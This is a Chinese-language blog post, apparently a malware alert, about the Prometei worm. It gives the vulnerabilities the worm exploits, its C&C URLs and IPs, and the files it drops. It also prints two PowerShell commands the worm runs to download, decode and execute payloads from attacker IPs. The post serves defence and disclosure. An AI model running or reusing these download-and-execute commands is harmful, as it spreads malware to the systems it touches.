最新病毒预警--Prometei 蠕虫病毒

已于 2022-03-22 08:47:55 修改
阅读量10w+ 收藏 3
点赞数 2
文章标签: 网络安全
于 2022-03-21 20:17:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48555088/article/details/123644939
版权

近日,蠕虫病毒Prometei正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window、Linux、macOS等系统)横向传播。提醒广大用户,尤其是企业、政府部门、学校、医院等拥有大型局域网机构,及时做好排查与防护工作,避免受到该病毒影响

病毒名称:Prometei

病毒种类:Trojan/Prometei.a

利用漏洞:永恒之蓝漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞

注意事项1:Win7用户及时打上永恒之蓝补丁!

传播途径:局域网

注意事项1:尽量不要连接来路不明的网络以及公共网络

C&C服务器:

URL:
http://p2.feefreepool.net/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
http://p3.feefreepool.net/cgi-bin/prometei.cgi
http://dummy.zero/cgi-bin/prometei.cgi
IP:
23.94.251.245
104.130.132.131
88.198.246.242
注意事项1:建议把URL写入hosts文件进行屏蔽,防止病毒更新

释放文件:

C:\Windows\dell\sqhost.exe
C:\Windows\dell\sqhost_new.exe
C:\Windows\dell\install.cmd
C:\Windows\dell\rdpclip_new.exe
C:\Windows\dell\updates1_new.7z
C:\Windows\dell\updates2_new.7z
C:\Windows\dell\netwalker_new
C:\Windows\dell\uplugplay_new
在这里插入图片描述
执行命令:

  1. 病毒下载命令
    病毒接收到后门指令后,会通过命令行执行PowerShell脚本,下载、解压含有恶意文件的压缩包(updata.7z),执行解压后的install.cmd

powershell "if(-not (Test-Path 'C:\Windows\dell\sqhost.exe')) {(New-Object
Net.WebClient).DownloadFile('http://104.130.132.131/update.7z','update.7z');Start-
Process cmd.exe -ArgumentList '/c taskkill -f -im rdpclip.exe&sqhost -shalchk 0DE3401BB72D31AE94B899FEF25483E3D424DCDC update.7z&ping -n 2 127.0.0.3&7z x update.7z -phorhorl23 -oC:\Windows\dell -y&install.cmd';}"
  1. 执行install.bat
    install内容:
    在这里插入图片描述
  2. RdpCIip横向传播模块
    RdpCIip横向传播模块会对局域网内所有的机器进行扫描,如:SMB、Redis、RPC、RDP、Apache、SSH、SQL Server、PostgreSQL服务端口,针对上述服务进行暴破攻击以及漏洞攻击(“永恒之蓝”、BlueKeep、ApacheLog4j 漏洞、Redis未经授权访问漏洞等),拥有大型局域网的政企机构面临较大的安全风险。在局域网暴破之前会通过miwalk模块(Mimikatz)获取系统登录凭证,通过获取的登录凭证和自带弱口令字典进行横向暴破攻击。攻击成功之后,被攻击主机会执行一段恶意代码。恶意代码会调用PowerShell命令,从服务器下载主模块并执行

cmd /C echo 123>C:\Windows\mshlpda32. dll
&powershell $p='C:\windows\zsvc.exe';
(New-Object Net.WebClient).DownloadFile('http://23.94.251.245/k.php? B=_%PROCESSOR_ARCHITECTURE%J%COMPUTERNAME%,XXXXXXXXXXXXXXXX@\$p);
$d=[IO.File]::ReadAllBytes($p);
$t=New-Object Byte[]($d.Length);
[int]$j=0;
for([int]$i=0;$i -It $d.Length;$i++) {
    $j+=66;$t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255; }
[io.file]::WriteAllBytes($p?  );
Start-Process $p;

病毒专杀:马上写完

Hacker-Li
关注
最新蠕虫病毒专杀工具
01-12
蠕虫病毒是最令人头痛的,一般的杀毒软件是无法杀干净的,通常只有做系统才可以完全清理干净,使用这个病毒专杀工具就可以省好多时间也可以让你的资料安全的保留。
国内蠕虫病毒暴力肆虐,用户重要文件被加密保存,强制付费恢复!
miaozenn的博客
01-15 581
原文来源 : 扩展迷EXTFANS 1月13日,不少关于计算机安全厂商和相关论坛都发布了一则紧急公告。 公告显示:最近,一种名叫“incaseformat”的蠕虫病毒正在国内肆意传播,造成了大范围影响。 据扩展迷查询到的信息,截止目前,国内已有多省市多行业的大量用户反馈中招。 中招用户均表示,自己电脑中除C盘之外的其他文件都突然被删除,且磁盘中可能被创建“incaseformat”文本文档。 C/C++的学习裙【七一二二八四七零五】,无论你是小白还是进阶者,是想转行还...
安全警告:最新蠕虫病毒正在网络横行
huasheng123的专栏
05-12 498
安全警告:最新蠕虫病毒正在网络横行  对网络威胁进行跟踪的Internet Storm中心对大家提出警告:一种蠕虫病毒正在感染一些安全性较低的网站,并且会对其数据库进行攻击。据报告,目前大约已有4000个网站被感染,被攻击的网站会被增加一些隐性代码,当用户访问这些网站时,这些代码会使访问者下载一些恶性软件到他们的电脑上。    提示大家:不要访问那些在进行网络搜索时会在页面中(包括缓存的网页)显示
蠕虫病毒
weixin_34077371的博客
02-14 899
蠕虫病毒 蠕虫病毒是一种常见的计算机病毒。它的传染机理是利用网络进行复制和传播,传染途径是通过网络和电子邮件。 比如近几年危害很大的“尼姆亚”病毒就是蠕虫病毒的一种。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。 蠕虫病毒的一般防治方法是:使用具有实...
人工智能-项目实践-预警-光纤预警系统.zip
12-23
总结来说,"人工智能-项目实践-预警-光纤预警系统.zip"是一个将人工智能技术应用于光纤预警系统的实例,展示了AI如何提升预警系统的智能化水平和反应速度,以及在DataDisplayPlatform-master项目中具体如何实现这一...
人工智能-项目实践-灾害预警-气象灾害预警.zip
12-23
人工智能-项目实践-灾害预警-气象灾害预警 介绍 求人不如求己,为了防止我错过洪水预警还去坐地铁,我打算写个服务于我自己的气象灾害预警提醒小程序。 每隔五分钟爬取指定城市的和风天气API 假如有气象预警,向...
人工智能-项目实践-预警-混凝土泵车砼活塞故障预警.zip
12-23
人工智能-项目实践-预警-混凝土泵车砼活塞故障预警 行业知识 泵车环境及运行参数是重要因素,赛题没有提供,只能从互联网获取,没有深入学习,提供以下供参考: 发动机2200-2300,一般转速在1000~3500之间,怠速可...
人工智能-项目实践-灾害预警-基于和风天气API的Workflow,支持灾害预警、AQI、今日天气、三日内天气查询 需自行配
12-23
人工智能-项目实践-灾害预警-基于和风天气API的Workflow,支持灾害预警、AQI、今日天气、三日内天气查询。需自行配置API 因为原作者初始设置base_url为商业版API,个人使用需修改源代码,较为不便,且和风天气API...
仓存管理查询表-自动预警-Excel模板
最新发布
07-17
【作品名称】:仓存管理查询表-自动预警-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
飞客病毒专杀
04-11
飞客病毒专杀工具,飞客蠕虫(Hack Exploit Win32 MS08-067)是一个利用微软 MS08-067 漏洞发起攻击的蠕虫病毒。该病毒会对随机生成的IP地址发起攻击,攻击成功后会下载一个木马病毒,通过修改注册表键值来使某免费安全工具功能失效。病毒会修改hosts文件,使用户无法正常访问安全厂商网站及服务器。
政企机构用户注意 蠕虫病毒Prometei正在针对局域网横向渗透传播
weixin_46404689的博客
02-18 3115
近日,火绒安全实验室监测到蠕虫病毒Prometei”正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window、Linux、macOS等系统)横向传播。火绒安全提醒广大用户,尤其是企业、政府部门、学校、医院等拥有大型局域网机构,及时做好排查与防护工作,避免受到该病毒影响。目前,火绒安全(个人版、企业版)产品已对该病毒进行拦截查杀。
morris蠕虫病毒
zhangzhechun的专栏
02-27 1401
发送邮件时,蠕虫会利用Sendmail程序的漏洞,伪装自己的源地址,并将自己的源码附加到邮件中。该蠕虫通过利用Unix系统中的漏洞,以分布式方式快速传播,导致当时的互联网中的数千台计算机崩溃或变得无法使用,造成了大量的损失和混乱。Morris蠕虫的意义不仅在于它是历史上第一次对互联网的破坏性攻击,更在于它促使了更广泛的对计算机安全问题的关注和研究,以及对互联网安全性的提高。由于Morris蠕虫的快速传播和破坏性,它在互联网上造成了严重的影响,促使人们开始关注计算机安全问题,并开展了更广泛的研究和探讨。
常见蠕虫病毒介绍和常见ACL配置
weixin_34187822的博客
03-28 1138
常见蠕虫病毒介绍和常见ACL配置 目前网络蠕虫病毒是当前网络最大的危害,是造成当前很多网络堵塞的重要原因。但是目前发现的这些蠕虫病毒,容易通过防火墙识别出这些被感染的计算机,它具有比较明显的扫描和连接特征,Eudemon防火墙支持黑名单功能,可以通过显示黑名单列表功能直接查看哪些设备可能感染了蠕虫病毒。当然有些BT下载用户,也可能被认为是在扫描被动态加入黑名单,这...
突发!incaseformat蠕虫病毒来袭,警惕文件遭删除
qq_44887910的博客
09-02 196
web安全防护
Yuner_蠕虫病毒分析
my的博客
03-16 329
利用autorun.inf文件传播自身也是很多蠕虫病毒常见行为。第一次分析的时候,也踩了很多坑(例如:第一次见到AutoIt写的软件、Autorun.inf文件作用、拿着ida狂看)。此篇对这些坑做了很多说明,分享经验同时也做个总结。
jwgkvsq.vmx蠕虫病毒的清理,名称为Net-Worm.Win32.Kido.ih
云淡风轻
09-17 3423
昨天插入一个u盘后,一会会局域网就掉线了,服务器可以上网,但是远程访问和路由莫名其妙的关掉了,经过试验发现,当我的电脑开机半分钟后,服务器的alg.exe进程占用CPU100%,用wireshark抓包发现我的电脑不停的发送arp查询包(遍历发送,所有ip192.168.0.*)
应急 | BuleHero挖矿蠕虫最新变种分析
moresec的博客
03-28 414
catalina.out即标准输出和标准出错,所有输出到这两个位置的都会进入catalina.out,这里包含tomcat运行自己输出的日志以及应用里向console输出的日志。catalina.{yyyy-MM-dd}.log是tomcat自己运行的一些日志,这些日志还会输出到catalina.out,但是应用向console输出的日志不会输出到catalina.{yyyy-MM-dd}.log,它是tomcat的启动和暂停时的运行日志,注意,它和catalina.out是里面的内容是不一样的。
Stuxnet 蠕虫病毒可能是有史以来最复杂的软件
csdm_cjm的专栏
06-13 2127
我们不知道 Stuxnet 的作者是谁,只知道大概是在2005年至2010年间编写的。这种病毒藏在 U 盘上。当 U 盘插入 PC,它会自动运行,将自已复制到该 PC。它至少有三种自动运行的方法。如果某种方法行不通,就尝试另一种。其中的两种运行方法是全新的,使用了 Windows 的两个无人知晓的秘密 Bug。一旦蠕虫进入 PC ,它会尝试获得该 PC 的管理员权限,使用的也是前面提到的那两个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值